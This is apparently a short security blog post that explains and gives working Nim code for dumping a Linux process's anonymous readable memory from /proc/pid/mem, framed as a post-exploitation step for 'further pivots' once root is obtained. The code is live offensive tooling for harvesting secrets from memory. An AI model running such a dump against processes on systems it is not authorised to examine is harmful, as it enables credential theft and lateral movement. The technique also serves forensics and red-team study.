Capturing process memory from /proc/pid/mem
fx2301
Posted on December 9, 2022
Why?
You want to inspect process memory to enable further pivots within an environment.
When?
You have root access to a Linux host, and no Linux Security Modules block access to /proc.
How?
A statically linked binary is especially convenient here - as is learning from how others have solve the problem (e.g. from Sliver's Dump Process Memory command).
This nim code reads metadata from /proc/pid/maps, and dumps to stdout offsets of /proc/pid/mem that are: readable, non executable, and non-file-backed. My experience mirrored the Sliver developer's in that [vvar] and [vdso] errored out when attempting to read them:
import std/os
import std/strutils
import std/strformat
if paramCount() != 1:
echo &"Usage: {paramStr(0)} <pid>"
quit(1)
let f = open(&"/proc/{paramStr(1)}/mem")
for line in lines(&"/proc/{paramStr(1)}/maps"):
let parts = line.split(" ")
# readable memory but not executable code
if parts[1][0] == 'r' and not parts[1].contains('x'):
# skip files mapped into memory
if parts[3] == "00:00":
# skip memory we will error out accessing
if not(line.endsWith("[vvar]") or line.endsWith("[vdso]")):
let addresses = parts[0].split("-")
let offset_start = addresses[0].parseHexInt()
let offset_end = addresses[1].parseHexInt()
f.setFilePos(offset_start)
var buffer: array[1024, int8]
var remaining = offset_end-offset_start
while remaining > 0:
let n = f.readBytes(buffer, 0, min(remaining, 1024))
remaining -= n
discard stdout.writeBytes(buffer, 0, n)
f.close()
đź’– đź’Ş đź™… đźš©
fx2301
Posted on December 9, 2022
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.
Related
githubcopilot AI Innovations at Microsoft Ignite 2024 What You Need to Know (Part 2)
November 29, 2024